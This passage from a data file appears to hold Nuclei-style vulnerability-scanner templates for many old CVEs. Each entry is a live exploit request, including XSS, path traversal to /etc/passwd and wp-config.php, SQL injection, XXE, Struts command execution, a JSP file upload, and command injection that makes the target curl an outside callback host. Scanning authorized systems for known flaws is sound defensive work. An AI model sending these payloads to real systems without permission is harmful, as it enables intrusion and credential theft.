="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-2449","info":{"name":"Apache Tomcat 4.x-7.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp","JSP Request Method"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["<TITLE>master</TITLE>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*\\.)?interact\\.sh\\/?(\\/.*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10383","info":{"name":"Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"<title>Lantronix\", \"Lantronix, Inc\")"],"internal":true}]},{"raw":["GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"><style onload=\\\"alert(document.domain)\\\">\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10738","info":{"name":"NagiosXI <= 5.4.12 menuaccess.php - SQL injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/nagiosql/admin/menuaccess.php"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10737","info":{"name":"NagiosXI <= 5.4.12 logbook.php SQL injection","severity":"high"},"requests":[{"raw":["POST /nagiosql/admin/logbook.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File 